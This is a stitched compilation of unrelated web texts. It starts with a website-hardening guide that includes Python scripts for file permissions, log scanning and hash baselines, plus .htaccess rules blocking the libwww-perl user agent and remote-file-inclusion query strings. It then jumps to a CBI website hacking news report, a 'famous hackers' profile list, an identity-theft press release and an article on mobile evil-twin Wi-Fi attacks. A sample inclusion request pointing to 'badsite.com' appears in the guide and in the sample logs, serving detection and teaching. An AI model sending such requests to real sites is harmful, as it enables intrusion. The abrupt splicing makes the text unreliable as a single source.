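    """Remove the group and other write bits (777 -> 755, 666 -> 644)."""
    for rel, _mode in findings:
        path = os.path.join(root, rel)
        current = stat.S_IMODE(os.lstat(path).st_mode)
        os.chmod(path, current & ~0o022)


def demo():
    """Constructed sample tree: one folder left at 777 and one file at 666."""
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "uploads"))
        for rel in ("index.php", "config.php", "uploads/photo.jpg"):
            with open(os.path.join(root, rel), "w") as fh:
                fh.write("sample\n")
        os.chmod(os.path.join(root, "index.php"), 0o644)
        os.chmod(os.path.join(root, "uploads/photo.jpg"), 0o644)
        os.chmod(os.path.join(root, "config.php"), 0o666)  # left over from an install
        os.chmod(os.path.join(root, "uploads"), 0o777)     # left over from an install
        before = audit_world_writable(root)
        tighten(root, before)   # afterwards, re-test the application
        after = audit_world_writable(root)
        return before, after


if __name__ == "__main__":
    found, remaining = demo()
    for rel, mode in found:
        print(f"world-writable: {rel} (mode {mode})")
    print("still world-writable after tightening:", remaining)
```

If the application stops working after tightening, restore the looser mode only on the specific file or folder that needs it, and only for as long as it needs it.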
6) Write your own scripts securely
These precautions are also absolutely necessary, but only if you write your own program code.
For the language you use, find and read an overview about security: PHP, ASP.NET, Cold Fusion, ...
When you use an unfamiliar function for the first time, check the manual for security considerations.
Learn to instinctively distrust data from the outside world. Write your code so that incoming malicious input can't trick it into doing something it shouldn't. Outside data includes: incoming form submission data, HTTP query strings, cookies.
Learn how to prevent "Remote File Inclusion". (#1 most common security error)
Learn how to prevent "SQL Injection". (#2 most common security error)
There are lots of online resources for learning how to code securely. All it takes is a web search.
For PHP, use a good php.ini file for extra security, to block common attacks.
7) Block suspicious activity with .htaccess
These are extra precautions that provide an additional layer of security. If you understand what this section is talking about, the discussion and code examples should help you to put some good protections in place. If you don't understand this section, don't worry about it unless you are under constant attack and other remedies have failed.
Download and examine your raw access logs, or analyze the lines here. You will most likely find attacks of the types described in my articles. Even if the attempts are unsuccessful, your logs give early warning about what methods are being used, which gives you time to figure out how to defend against them. Here are some examples of how to block suspicious activity:
Ban bad robots.
One program often misused for automated remote file inclusion attacks is called "libwww-perl". The RFI cannot succeed if your server refuses to serve the file, so blocking this commonly malicious User-Agent is one defense. Put the following lines in your public_html/.htaccess, in a part of the file that is not delimited by HTML-style tags like <tag></tag>:
SetEnvIfNoCase User-Agent libwww-perl block_bad_bots
# to deny more User-Agents, copy the line above and change
# only libwww-perl, to match the new name.
deny from env=block_bad_bots
SetEnvIfNoCase does a case-insensitive test of the User-Agent against a regular expression, which in this case is "contains libwww-perl". If it matches, it sets the variable block_bad_bots. The final line says if block_bad_bots was set (i.e. if the requestor matched any of the bad robots), deny the request and send a 403 Forbidden error instead. Regardless of what the bad robot was trying to do, it won't succeed.
Ban suspicious URL query strings.
Another defense against RFI is to block all requests having the form: GET /index.php?inc=http://badsite.com/badscript.txt?
The following .htaccess code blocks any request where the query string (the part after the first question mark) contains "=http://" or "=ftp://". During times when you need to use a query string of that type yourself, you can comment out the code block or enable the exception shown:
# If the next line is already in your .htaccess, you don't need to add a 2nd one.
RewriteEngine On
RewriteCond %{QUERY_STRING} ^.*=(ht|f)tp\://.*$ [NC]
# Allow yourself, for SMF Forum Package Manager upgrades.
# Set it to your own IP address so you are the only one who won't be blocked.
#RewriteCond %{REMOTE_ADDR} !^111\.222\.333\.444$ [NC]
RewriteRule .* - [F,L]
To test: you should get a 403 Forbidden error when you try to go to:
If you have coded your pages so they use remote file includes from your own site or from some external site (such that your site receives requests, constructed by you, that have URLs in the query strings), my first advice is that you should try to stop doing that:
Instead of sending your own site a request that has a URL in the query string, you can put in the query string a text string that the receiving page translates into a URL after it receives it. That way, your script can't be tricked by someone who sends it a malicious URL instead of one of the legitimate ones it expects.
If you must send your own site requests that have URLs in the query strings, you can use a more complicated .htaccess to allow your own remote file inclusion requests but ban others:
# FIRST, DISALLOW QUERY STRINGS CONTAINING MORE INSTANCES OF http://
# THAN WE EVER USE OURSELVES, TO LIMIT THE NUMBER OF TESTS WE MUST DO LATER.
# THIS EXAMPLE ALLOWS ONLY ONE INSTANCE PER QUERY STRING.
RewriteCond %{QUERY_STRING} (.*http(\:|%3A)(/|%2F)(/|%2F).*){2,} [NC]
RewriteRule .* - [F,L]
# NOW WE CAN TEST EACH INSTANCE AGAINST THE LIST OF SITES WE WANT TO ALLOW.
# SINCE THIS IS A NEW REWRITE RULE, WE MUST TEST AGAIN WHETHER IT CONTAINS http://
RewriteCond %{QUERY_STRING} http(\:|%3A)(/|%2F)(/|%2F) [NC]
# THEN FALL THROUGH TO THE BAN IF IT IS NOT ONE OF THE SITES IN OUR ALLOW LIST.
RewriteCond %{QUERY_STRING} !(http(\:|%3A)(/|%2F)(/|%2F)(www\.)?site1\.com) [NC]
RewriteCond %{QUERY_STRING} !(http(\:|%3A)(/|%2F)(/|%2F)(www\.)?site2\.com) [NC]
#ADD A LINE FOR EACH EXTERNAL SITE YOU WANT TO ALLOW TO APPEAR IN QUERY STRINGS.
RewriteRule .* - [F,L]
Allowing for more than one instance of http:// in your query strings is possible. It requires complex code that we can custom design for you if needed.
Other query string bans:
1) Malicious RFI attempts almost always have a question mark at the end of the query string. Ban any query string that contains a question mark. The first question mark (which marks the beginning of the query string) is not part of the query string, so only question marks after the first one will trigger the ban:
RewriteCond %{QUERY_STRING} (\?|%3F) [NC]
RewriteRule .* - [F,L]
2) Be creative: find other characteristics that are common in the attacks on your site but that are never present in legitimate requests. Be thorough: use every good ban rule you can think of. It is very satisfying to see an attack on your site and know that even though it only needed to trigger one ban rule to fail, there were six others in reserve that it would have triggered.
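An added example (not part of the original article) that applies the ban characteristics above to raw access-log lines, so you can see which requests already in your logs each rule would have refused. The log lines, IP addresses, rule names and the libwww-perl version string are constructed for illustration; the patterns are the ones from the .htaccess code above.

```python
import re

# The page's ban characteristics as (name, field tested, pattern). [NC] becomes re.I.
RULES = [
    ("bad_bot_user_agent", "ua", re.compile(r"libwww-perl", re.I)),
    ("url_in_query", "query", re.compile(r"^.*=(ht|f)tp\://.*$", re.I)),
    ("url_any_encoding", "query", re.compile(r"http(\:|%3A)(/|%2F)(/|%2F)", re.I)),
    ("extra_question_mark", "query", re.compile(r"(\?|%3F)", re.I)),
]

# Apache "combined" log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Constructed sample lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2010:04:10:01 +0000] "GET /index.php?page=about HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Mar/2010:04:11:52 +0000] '
    '"GET /index.php?inc=http://badsite.com/badscript.txt? HTTP/1.1" '
    '200 5120 "-" "libwww-perl/5.805"',
    '203.0.113.5 - - [12/Mar/2010:04:12:30 +0000] '
    '"GET /index.php?inc=http%3A%2F%2Fbadsite.com%2Fbadscript.txt HTTP/1.1" '
    '404 310 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [12/Mar/2010:04:13:09 +0000] "GET /forum/index.php?topic=12.0 HTTP/1.1" '
    '200 8841 "-" "Mozilla/5.0"',
]


def scan(lines):
    """Return (ip, status, request_target, [matched rule names]) for flagged lines."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        # The query string is everything after the FIRST question mark,
        # exactly as sent (still percent-encoded).
        _path, _sep, query = m.group("target").partition("?")
        fields = {"ua": m.group("ua"), "query": query}
        matched = [name for name, field, rx in RULES if rx.search(fields[field])]
        if matched:
            hits.append((m.group("ip"), m.group("status"), m.group("target"), matched))
    return hits


if __name__ == "__main__":
    for ip, status, target, matched in scan(SAMPLE_LOG):
        print(f"{ip} status={status} {target}")
        print("    would trigger:", ", ".join(matched))
```

Apache tests %{QUERY_STRING} as received, without decoding it, which is why the percent-encoded request is caught only by the pattern that lists %3A and %2F. A status of 200 on a flagged line means the request was served, so that page deserves a closer look.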
Ban IP addresses responsible for suspicious activity.
You can block IP addresses (or ranges) in .htaccess or by cPanel > Deny IP. Although such bans can be useful against IP addresses you are 100% certain will never make a legitimate request, they aren't otherwise very practical. Once a botnet starts attacking your site, the requests will come from hundreds of different IPs, and banning them all will be futile. It is much better to ban by the other characteristics of the requests.
See this forum thread for further discussion about using .htaccess to block malicious requests, links to websites with suggested .htaccess code for blocking such requests, and a basic introduction to help understand the Perl regular expressions that are used for pattern matching in .htaccess.
Preparations that will make hack diagnosis and cleanup easier
1) Always have a backup copy of your entire website and its databases
You can use FTP and/or cPanel > Backups. Keep the backup somewhere not on your server, such as on your local PC or a DVD. Even if your webhost does backups, make a separate set for yourself. Do a new backup whenever there is enough new content that you don't want to have to redo the work. Keep more than one "generation" of backups. For example, if you back up monthly, keep separate versions from 1 month ago and from 2 months ago. This guards against backing up your site after it's been infected but before you discovered it. You'll still have (hopefully) a slightly older backup that isn't infected. For the same reason, don't back up too often.
2) Turn on log archiving in cPanel now
Your raw HTTP and FTP logs are an important source of information after an attack, but the logs are normally deleted each day. Enable archiving to allow them to accumulate and preserve the evidence after an attack. Periodically download and review the logs to see what kinds of attacks are being launched against your site. As is so often the case, becoming familiar with what is normal will help you detect when something is not. Accumulated logs can take a lot of disk space, so you might want to delete old ones from the server periodically.
3) Get a complete list of your site files NOW while they are known-good
This article describes how to get a list of all the files in your website. If you do it now, it will be a baseline list of the files you can assume are supposed to be there. If your site gets damaged, the list will help you decide whether a file you don't recognize is new or is just a system file that you never noticed before.
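An added example (not from the original article) of taking such a baseline and comparing against it later. It goes one step beyond a plain file list by recording a SHA-256 hash per file, so it reports modified files as well as new and missing ones. The function names, file names and the demo site are constructed assumptions.

```python
import hashlib
import json
import os
import tempfile


def build_manifest(root):
    """Map each file's path (relative to root) to the SHA-256 of its contents."""
    manifest = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            digest = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            manifest[rel] = digest.hexdigest()
    return manifest


def save_manifest(manifest, path):
    """Write the baseline as JSON. Keep this file off the server."""
    with open(path, "w") as fh:
        json.dump(manifest, fh, indent=1, sort_keys=True)


def load_manifest(path):
    with open(path) as fh:
        return json.load(fh)


def compare(baseline, current):
    """Report files added, removed or changed since the baseline was taken."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(p for p in set(baseline) & set(current)
                          if baseline[p] != current[p]),
    }


def _write(root, rel, data):
    with open(os.path.join(root, rel), "wb") as fh:
        fh.write(data)


def demo():
    """Constructed site: take a baseline, alter the site, then compare."""
    with tempfile.TemporaryDirectory() as site, tempfile.TemporaryDirectory() as safe:
        os.mkdir(os.path.join(site, "css"))
        os.mkdir(os.path.join(site, "images"))
        _write(site, "index.php", b"<?php echo 'home'; ?>\n")
        _write(site, "css/style.css", b"body { margin: 0; }\n")
        _write(site, "images/logo.gif", b"GIF89a")
        baseline_file = os.path.join(safe, "baseline.json")
        save_manifest(build_manifest(site), baseline_file)

        # Later: one file edited, one unexpected file present, one file gone.
        _write(site, "index.php", b"<?php echo 'home'; ?>\n<!-- extra line -->\n")
        _write(site, "images/extra.php", b"<?php ?>\n")
        os.remove(os.path.join(site, "css/style.css"))

        return compare(load_manifest(baseline_file), build_manifest(site))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

Rebuild the baseline after every legitimate update to the site, otherwise your own changes will show up as differences.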
4) Explore your website and become familiar with what is there
Not just your pages, but the whole site, using FTP or File Manager or the complete file list you made. If you get used to what is normal, things that aren't will catch your attention.
5) Use good database connection practices in scripts:
a) Create separate MySQL users for your scripts to use
If you use your cPanel userID and password for database connections in your scripts, then changing your cPanel password will instantly break all your scripts until you recode them to use the new password.
Instead, create one or more new users, completely unrelated to your cPanel login, that your scripts can use for their database connections:
Go to cPanel > MySQL® Databases > Current Users.
In Username: enter the name of the user to create. Although the existing user names might appear as YourUserID_username, don't enter the prefix and underscore. cPanel will do that for you, if needed.
In Password: enter the password to use. Make it a strong one.
Click Create User, read the confirmation screen, and then Go Back to the MySQL Account Maintenance page.
Go to the Add Users To Your Databases section.
In the left dropdown box, select the user you just created.
In the right dropdown box, select the database you want that user to be able to connect to.
Select the Privileges you want that user to have for that database, by checking the appropriate boxes. Select only the privileges the user really needs for performing whatever tasks your scripts will do. Granting only limited privileges is a security precaution.
Click Add User To Database. Your new user now has the specified privileges, for that database only. Add the user to other databases, if needed.
Now update your scripts so they use the connection data for this new user instead of your old cPanel user. However, ...
b) Put your MySQL connection data in a well protected file
If each of your scripts has its own code block for database connection, then if you are hacked and have to change your passwords, you'll have to hunt through all your files to find every code block that needs changing.
Instead, put all your database connection code in one central location such as an include file that is well-protected from web access, and make all your scripts read it from there. There are examples and some discussion about how to do this in the User Contributed Notes at http://us.php.net/mysql_connect. You can protect your include file by putting it in a folder above public_html, or in any folder that is closed to web access by an .htaccess file, or by the other methods mentioned in the php.net Notes.
Unfortunately, none of these protection methods will keep your data safe from someone who has actually gotten into your site, but the new database connection method you have just created will make it easy to change your password (in just one place) if that does happen.
New Delhi: In a major embarrassment, the website of the Central Bureau of Investigation (CBI) was hacked on Friday night by programmers identifying themselves as "Pakistani Cyber Army".
The home page of the CBI website had a message from the 'Pakistani Cyber Army' warning the Indian Cyber Army not to attack their websites.
The CBI website, supposed to be one of the most secure websites, is connected to the command centre of world police organisation - Interpol - 24x7.
The message from the hackers also spoke about the filtering controls provided by the National Informatics Centre (NIC), a body which mans computer servers across the country. It also claims to have hacked another 270 websites.
Intelligence agencies have often warned the government that proper cyber security was not being ensured in government offices and that no security audit was being carried out.
The website has still not been restored. In a late night statement, the investigating agency said, "CBI is aware that its official website has been hacked and defaced. An inquiry has been launched and necessary remedial measures are underway to restore it."
Telecom Minister Kapil Sibal has said that the cyber attack on the CBI website is a serious issue and that he would look into it. "These are important issues, we will look into it," Sibal said.
Speaking on the issue, Supreme Court advocate and cyber law expert Pavan Duggal said the hacking of CBI website is an act of cyber war. "I think this is not a mere hacking incident. It is a step towards a cyber war," he said.
Top 10 Most Famous Hackers of All Time
The portrayal of hackers in the media has ranged from the high-tech super-spy, as in Mission Impossible where Ethan Hunt rappels from the ceiling to hack the CIA computer system and steal the "NOC list," to the lonely anti-social teen who is simply looking for entertainment.
The reality, however, is that hackers are a very diverse bunch, a group simultaneously blamed with causing billions of dollars in damages as well as credited with the development of the World Wide Web and the founding of major tech companies. In this article, we test the theory that truth is better than fiction by introducing you to ten of the most famous hackers, both nefarious and heroic, to let you decide for yourself.
Black Hat Crackers
The Internet abounds with hackers, known as crackers or "black hats," who work to exploit computer systems. They are the ones you've seen on the news being hauled away for cybercrimes. Some of them do it for fun and curiosity, while others are looking for personal gain. In this section we profile five of the most famous and interesting "black hat" hackers.
Jonathan James: James gained notoriety when he became the first juvenile to be sent to prison for hacking. He was sentenced at 16 years old. In an anonymous PBS interview, he professes, "I was just looking around, playing around. What was fun for me was a challenge to see what I could pull off."
James's major intrusions targeted high-profile organizations. He installed a backdoor into a Defense Threat Reduction Agency server. The DTRA is an agency of the Department of Defense charged with reducing the threat to the U.S. and its allies from nuclear, biological, chemical, conventional and special weapons. The backdoor he created enabled him to view sensitive emails and capture employee usernames and passwords.
James also cracked into NASA computers, stealing software worth approximately $1.7 million. According to the Department of Justice, "The software supported the International Space Station's physical environment, including control of the temperature and humidity within the living space." NASA was forced to shut down its computer systems, ultimately racking up a $41,000 cost. James explained that he downloaded the code to supplement his studies on C programming, but contended, "The code itself was crappy . . . certainly not worth $1.7 million like they claimed."
Given the extent of his intrusions, if James, also known as "c0mrade," had been an adult he likely would have served at least 10 years. Instead, he was banned from recreational computer use and was slated to serve a six-month sentence under house arrest with probation. However, he served six months in prison for violation of parole. Today, James asserts that he's learned his lesson and might start a computer security company.
Adrian Lamo: Lamo's claim to fame is his break-ins at major organizations like The New York Times and Microsoft. Dubbed the "homeless hacker," he used Internet connections at Kinko's, coffee shops and libraries to do his intrusions. In a profile article, "He Hacks by Day, Squats by Night," Lamo reflects, "I have a laptop in Pittsburgh, a change of clothes in D.C. It kind of redefines the term multi-jurisdictional."
Lamo's intrusions consisted mainly of penetration testing, in which he found flaws in security, exploited them and then informed companies of their shortcomings. His hits include Yahoo!, Bank of America, Citigroup and Cingular. When white hat hackers are hired by companies to do penetration testing, it's legal. What Lamo did is not.
When he broke into The New York Times' intranet, things got serious. He added himself to a list of experts and viewed personal information on contributors, including Social Security numbers. Lamo also hacked into The Times' LexisNexis account to research high-profile subject matter.
For his intrusion at The New York Times, Lamo was ordered to pay approximately $65,000 in restitution. He was also sentenced to six months of home confinement and two years of probation, which expired January 16, 2007. Lamo is currently working as an award-winning journalist and public speaker.
Kevin Mitnick: A self-proclaimed "hacker poster boy," Mitnick went through a highly publicized pursuit by authorities. His mischief was hyped by the media but his actual offenses may be less notable than his notoriety suggests. The Department of Justice describes him as "the most wanted computer criminal in United States history." His exploits were detailed in two movies: Freedom Downtime and Takedown.
Mitnick had a bit of hacking experience before committing the offenses that made him famous. He started out exploiting the Los Angeles bus punch card system to get free rides. Then, like Apple co-founder Steve Wozniak, he dabbled in phone phreaking. Although there were numerous offenses, Mitnick was ultimately convicted for breaking into the Digital Equipment Corporation's computer network and stealing software.
Mitnick's mischief got serious when he went on a two and a half year "coast-to-coast hacking spree." The CNN article, "Legendary computer hacker released from prison," explains that "he hacked into computers, stole corporate secrets, scrambled phone networks and broke into the national defense warning system." He then hacked into computer expert and fellow hacker Tsutomu Shimomura's home computer, which led to his undoing.
Today, Mitnick has been able to move past his role as a black hat hacker and become a productive member of society. He served five years, about 8 months of it in solitary confinement, and is now a computer security consultant, author and speaker.
Kevin Poulsen: Also known as Dark Dante, Poulsen gained recognition for his hack of LA radio's KIIS-FM phone lines, which earned him a brand new Porsche, among other items. Law enforcement dubbed him "the Hannibal Lecter of computer crime."
Authorities began to pursue Poulsen after he hacked into a federal investigation database. During this pursuit, he further drew the ire of the FBI by hacking into federal computers for wiretap information.
His hacking specialty, however, revolved around telephones. Poulsen's most famous hack, KIIS-FM, was accomplished by taking over all of the station's phone lines. In a related feat, Poulsen also "reactivated old Yellow Page escort telephone numbers for an acquaintance who then ran a virtual escort agency." Later, when his photo came up on the show Unsolved Mysteries, 1-800 phone lines for the program crashed. Ultimately, Poulsen was captured in a supermarket and served a sentence of five years.
Since serving time, Poulsen has worked as a journalist. He is now a senior editor for Wired News. His most prominent article details his work on identifying 744 sex offenders with MySpace profiles.
Robert Tappan Morris: Morris, son of former National Security Agency scientist Robert Morris, is known as the creator of the Morris Worm, the first computer worm to be unleashed on the Internet. As a result of this crime, he was the first person prosecuted under the 1986 Computer Fraud and Abuse Act.
Morris wrote the code for the worm while he was a student at Cornell. He asserts that he intended to use it to see how large the Internet was. The worm, however, replicated itself excessively, slowing computers down so that they were no longer usable. It is not possible to know exactly how many computers were affected, but experts estimate an impact of 6,000 machines. He was sentenced to three years' probation, 400 hours of community service and fined $10,500. Morris is currently working as a tenured professor at the MIT Computer Science and Artificial Intelligence Laboratory. He principally researches computer network architectures including distributed hash tables such as Chord and wireless mesh networks such as Roofnet.
White Hat Hackers
Hackers that use their skills for good are classified as "white hat." These white hats often work as certified "Ethical Hackers," hired by companies to test the integrity of their systems. Others operate without company permission by bending but not breaking laws and in the process have created some really cool stuff. In this section we profile five white hat hackers and the technologies they have developed.
Stephen Wozniak: "Woz" is famous for being the "other Steve" of Apple. Wozniak, along with current Apple CEO Steve Jobs, co-founded Apple Computer. He has been awarded with the National Medal of Technology as well as honorary doctorates from Kettering University and Nova Southeastern University. Additionally, Woz was inducted into the National Inventors Hall of Fame in September 2000.
Woz got his start in hacking making blue boxes, devices that bypass telephone-switching mechanisms to make free long-distance calls. After reading an article about phone phreaking in Esquire, Wozniak called up his buddy Jobs. The pair did research on frequencies, then built and sold blue boxes to their classmates in college. Wozniak even used a blue box to call the Pope while pretending to be Henry Kissinger. Wozniak dropped out of college and came up with the computer that eventually made him famous. Jobs had the bright idea to sell the computer as a fully assembled PC board. The Steves sold Wozniak's cherished scientific calculator and Jobs' VW van for capital and got to work assembling prototypes in Jobs' garage. Wozniak designed the hardware and most of the software. In the Letters section of Woz.org, he recalls doing "what Ed Roberts and Bill Gates and Paul Allen did and tons more, with no help." Wozniak and Jobs sold the first 100 of the Apple I to a local dealer for $666.66 each.
Woz no longer works full time for Apple, focusing primarily on philanthropy instead. Most notable is his function as fairy godfather to the Los Gatos, Calif. School District. "Wozniak 'adopted' the Los Gatos School District, providing students and teachers with hands-on teaching and donations of state-of-the-art technology equipment."
Tim Berners-Lee: Berners-Lee is famed as the inventor of the World Wide Web, the system that we use to access sites, documents and files on the Internet. He has received numerous recognitions, most notably the Millennium Technology Prize.
While a student at Oxford University, Berners-Lee was caught hacking access with a friend and subsequently banned from University computers. w3.org reports, "Whilst [at Oxford], he built his first computer with a soldering iron, TTL gates, an M6800 processor and an old television." Technological innovation seems to have run in his genes, as Berners-Lee's parents were mathematicians who worked on the Manchester Mark1, one of the earliest electronic computers.
While working with CERN, a European nuclear research organization, Berners-Lee created a hypertext prototype system that helped researchers share and update information easily. He later realized that hypertext could be joined with the Internet. Berners-Lee recounts how he put them together: "I just had to take the hypertext idea and connect it to the TCP and DNS ideas and – ta-da! – the World Wide Web."
Since his creation of the World Wide Web, Berners-Lee founded the World Wide Web Consortium at MIT. The W3C describes itself as "an international consortium where Member organizations, a full-time staff and the public work together to develop Web standards." Berners-Lee's World Wide Web idea, as well as standards from the W3C, is distributed freely with no patent or royalties due.
Linus Torvalds: Torvalds fathered Linux, the very popular Unix-based operating system. He calls himself "an engineer," and has said that his aspirations are simple, "I just want to have fun making the best damn operating system I can."
Torvalds got his start in computers with a Commodore VIC-20, an 8-bit home computer. He then moved on to a Sinclair QL. Wikipedia reports that he modified the Sinclair "extensively, especially its operating system." Specifically, Torvalds' hacks included "an assembler and a text editor…as well as a few games."
Torvalds created the Linux kernel in 1991, using the Minix operating system as inspiration. He started with a task switcher in Intel 80386 assembly and a terminal driver. After that, he put out a call for others to contribute code, which they did. Currently, only about 2 percent of the Linux kernel is written by Torvalds himself. The success of this public invitation to contribute code for Linux is touted as one of the most prominent examples of free/open source software.
Currently, Torvalds serves as the Linux ringleader, coordinating the code that volunteer programmers contribute to the kernel. He has had an asteroid named after him and received honorary doctorates from Stockholm University and University of Helsinki. He was also featured in Time Magazine's "60 Years of Heroes."
Richard Stallman: Stallman's fame derives from the GNU Project, which he founded to develop a free operating system. For this, he's known as the father of free software. His "Serious Bio" asserts, "Non-free software keeps users divided and helpless, forbidden to share it and unable to change it. A free operating system is essential for people to be able to use computers in freedom." Stallman, who prefers to be called rms, got his start hacking at MIT. He worked as a "staff hacker" on the Emacs project and others. He was a critic of restricted computer access in the lab. When a password system was installed, Stallman broke it down, resetting passwords to null strings, then sent users messages informing them of the removal of the password system.
Stallman's crusade for free software started with a printer. At the MIT lab, he and other hackers were allowed to modify code on printers so that they sent convenient alert messages. However, a new printer came along – one that they were not allowed to modify. It was located away from the lab and the absence of the alerts presented an inconvenience. It was at this point that he was "convinced…of the ethical need to require free software."
With this inspiration, he began work on GNU. Stallman wrote an essay, "The GNU Project," in which he recalls choosing to work on an operating system because it's a foundation, "the crucial software to use a computer." At this time, the GNU/Linux version of the operating system uses the Linux kernel started by Torvalds. GNU is distributed under "copyleft," a method that employs copyright law to allow users to use, modify, copy and distribute the software.
Stallman's life continues to revolve around the promotion of free software. He works against movements like Digital Rights Management (or as he prefers, Digital Restrictions Management) through organizations like Free Software Foundation and League for Programming Freedom. He has received extensive recognition for his work, including awards, fellowships and four honorary doctorates.
Tsutomu Shimomura: Shimomura reached fame in an unfortunate manner: he was hacked by Kevin Mitnick. Following this personal attack, he made it his cause to help the FBI capture him.
Shimomura's work to catch Mitnick is commendable, but he is not without his own dark side. Author Bruce Sterling recalls: "He pulls out this AT&T cellphone, pulls it out of the shrinkwrap, finger-hacks it, and starts monitoring phone calls going up and down Capitol Hill while an FBI agent is standing at his shoulder, listening to him."
Shimomura out-hacked Mitnick to bring him down. Shortly after finding out about the intrusion, he rallied a team and got to work finding Mitnick. Using Mitnick's cell phone, they tracked him near Raleigh-Durham International Airport. The article, "SDSC Computer Experts Help FBI Capture Computer Terrorist" recounts how Shimomura pinpointed Mitnick's location. Armed with a technician from the phone company, Shimomura "used a cellular frequency direction-finding antenna hooked up to a laptop to narrow the search to an apartment complex." Mitnick was arrested shortly thereafter. Following the pursuit, Shimomura wrote a book about the incident with journalist John Markoff, which was later turned into a movie.
We hope you have enjoyed our introduction to some of the most famous real-life hackers, both white and black alike, and have gotten a clearer impression of who hackers really are. To find out more about hacking, cracking, these or other famous hackers, or just how to keep your computer safe from all of the above, check out the following resources:
By the time you finish reading this news release, another 100 American identities will be stolen. ID theft tops the list of consumer complaints at the Federal Trade Commission (FTC). It has become so prevalent that consumers are increasingly subscribing to ID theft protection services.
"The cost of having your identity stolen is not only measured in dollars," notes LoudSiren.com V.P. Paul Vazquez. "An ID theft incident can take hundreds of hours of work to correct and years to fully recover from. Having some form of ID theft protection gives consumers peace of mind."
LoudSiren.com, a member of the Identity Protection Network™, also recommends consumers follow these Ten Tips to be better protected (source FTC).
1. Shred documents with personal information before you discard them.
2. Don't carry your Social Security card in your wallet or give out your number unless absolutely necessary.
3. Don't give out personal information over the phone, through the mail or on the Internet unless you know and trust who you are dealing with.
4. Keep your personal information in a secure place at home.
5. Inspect your credit report regularly.
6. Monitor your monthly statements for charges you didn't make.
7. Check with the company if you get a surprise bill or if you were denied credit for no apparent reason.
8. If you suspect identity theft, place a "fraud alert" on your credit reports.
9. Close any accounts that have been tampered with or established fraudulently.
10. If your identity is stolen, file a police report because creditors may want proof of the crime.
LoudSiren.com's Identity Protection Network™ is the only identity protection service that:
1. Protects consumers' privacy by keeping their personal phone numbers private.
2. Speeds the process of clearing fraud alerts with a patent-pending identity authentication technology.
3. Keeps a record of credit requests sent to consumers and consumer responses.
4. Allows consumers with the push of a button to immediately report to law enforcement fraudulent attempts to open new credit accounts.
To steal your data through a rogue access point attack, a hacker needs only to overpower the local Wi-Fi access point and have your laptop associate with his evil network rather than the public one. You will still be connected to the Internet, except that all your personal data will pass through the hacker's computer, which acts as a man-in-the-middle.
To run a successful rogue access point attack you need to control DNS and Internet traffic, as well as be able to sniff that traffic, and in the past that required another laptop. But CNET reporter Robert Vamosi presents a mobile phone scenario outlined by Carl Banzhof, VP and chief technology evangelist for McAfee, during the RSA Conference 2007 in San Francisco.
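From the defender's side, the two traits described above (a second radio advertising the public network's name, and a signal that overpowers the real access point) can be checked against a list of the access points a venue actually operates. The following is an added example, not code from the article or from Banzhof's talk; the SSID, BSSIDs, signal levels and the 10 dB margin are constructed assumptions.

```python
# Constructed inventory of the access points the venue really operates.
KNOWN_APS = {
    "CoffeeShop-Guest": {
        "bssids": {"00:11:22:33:44:01", "00:11:22:33:44:02"},
        "security": "WPA2",
    },
}

# Constructed scan results: (ssid, bssid, rssi_dbm, security).
SAMPLE_SCAN = [
    ("CoffeeShop-Guest", "00:11:22:33:44:01", -67, "WPA2"),
    ("CoffeeShop-Guest", "00:11:22:33:44:02", -72, "WPA2"),
    ("CoffeeShop-Guest", "de:ad:be:ef:00:01", -38, "OPEN"),
    ("HomeNet", "aa:bb:cc:00:00:09", -80, "WPA2"),
]


def find_evil_twins(scan, known_aps, margin_db=10):
    """Flag radios that advertise an inventoried SSID from a BSSID not in inventory."""
    # Strongest signal seen from a legitimate radio, per SSID.
    strongest_legit = {}
    for ssid, bssid, rssi, _sec in scan:
        ap = known_aps.get(ssid)
        if ap and bssid.lower() in ap["bssids"]:
            strongest_legit[ssid] = max(rssi, strongest_legit.get(ssid, -200))

    findings = []
    for ssid, bssid, rssi, sec in scan:
        ap = known_aps.get(ssid)
        if ap is None or bssid.lower() in ap["bssids"]:
            continue  # SSID we do not manage, or one of our own radios
        reasons = ["unknown BSSID for known SSID"]
        if sec != ap["security"]:
            reasons.append(f"security mismatch ({sec} vs {ap['security']})")
        legit = strongest_legit.get(ssid)
        if legit is None:
            reasons.append("no legitimate AP visible")
        elif rssi >= legit + margin_db:
            reasons.append(f"overpowers legitimate AP by {rssi - legit} dB")
        findings.append({"ssid": ssid, "bssid": bssid, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_evil_twins(SAMPLE_SCAN, KNOWN_APS):
        print(finding)
```

The check depends on the BSSID inventory being accurate, so it is one signal to combine with other wireless monitoring rather than a complete detector.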
Mobile phones vs laptops
The market for smart phones, some with the memory and capacity of a small laptop, continues to grow every day.
Banzhof notes that many mobile devices support, or will soon support, Bluetooth, infrared, GPRS/EDGE, and Wi-Fi 802.11 technology. The market is evenly split in operating systems between BlackBerry OS, Palm OS, and Windows Mobile, with the latter capable of running Internet Information Server (IIS). It's the Windows Mobile OS that interested Banzhof most.
The advantages of using a mobile device in an evil twin attack instead of a bulky laptop are many: mobile devices are easily camouflaged, portable, and can allow close proximity to the intended victim. Mobile devices are rapidly becoming transparent; everyone has one, so what's the big security concern?
Creating a mobile access point
To carry out this mobile evil twin attack, Banzhof chose the T-Mobile MDA for his experiment. It runs Windows Mobile 5.0 as its operating system. It uses a TI OMAP 850 processor, so it has enough oomph, and it includes an 802.11 chipset, the TI ACX100. Best of all, it has a robust developer community.
